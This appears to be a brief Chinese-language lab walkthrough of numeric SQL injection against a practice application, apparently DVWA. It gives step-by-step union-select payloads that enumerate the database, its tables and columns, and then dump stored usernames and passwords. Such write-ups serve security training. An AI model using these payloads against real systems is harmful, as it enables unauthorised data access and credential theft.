1、输入’ or 1=1 # ,发现’被转义成\’ ‘ “ \ 都被转义加\
2、输入1 or 1=1 # ,发现有数字型注入
3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询
4、输入1 union select user(),database() # ,爆出当前用户和数据库
5、 输入1 union select table_name,table_rows from information_schema.tables where table_schema=0x64767761 # ,查询目前数据库的表格
6、输入 1 union select column_name,2 from information_schema.columns where table_name=0x7573657273 # ,查询users表的字段信息
7、输入 1 union select user,password from users #,爆出用户名和密码